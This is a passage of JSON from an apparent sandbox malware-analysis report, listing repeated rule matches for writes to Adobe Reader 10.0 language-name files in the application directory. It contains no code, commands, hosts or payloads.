"technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_us.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_UY.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_uy.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9928", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_uy.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_VE.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ve.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9937", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ve.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es__TRADITIONAL.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es__traditional.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9946", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es__traditional.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.et.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.et.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9955", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.et.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.et_EE.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.et_ee.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9964", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.et_ee.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fi.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fi.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9973", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fi.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fi_FI.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fi_fi.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9982", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fi_fi.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fi_FI_PREEURO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fi_fi_preeuro.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9991", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fi_fi_preeuro.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fr_CA.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fr_ca.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10000", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fr_ca.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fr_FR.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fr_fr.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10009", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fr_fr.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fr_FR_PREEURO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fr_fr_preeuro.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10018", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fr_fr_preeuro.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.he.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.he.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10027", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.he.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.he_IL.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.he_il.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10036", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.he_il.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hr.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hr.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10045", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hr.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hr_HR.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hr_hr.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10054", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hr_hr.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hu.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hu.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10063", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hu.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hu_HU.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hu_hu.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10072", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hu_hu.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10081", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it_CH.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it_ch.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10090", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it_ch.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it_IT.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it_it.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10099", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it_it.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it_IT_PREEURO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it_it_preeuro.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10108", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it_it_preeuro.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ja.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ja.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10117", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ja.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ja_JP.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ja_jp.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10126", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ja_jp.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ja_JP_TRADITIONAL.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ja_jp_traditional.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10135", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ja_jp_traditional.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ko.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ko.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10144", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ko.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ko_KR.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ko_kr.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10153", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ko_kr.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lt.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lt.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10162", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lt.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lt_LT.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lt_lt.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_10171", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lt_lt.txt\".", "technique_path": 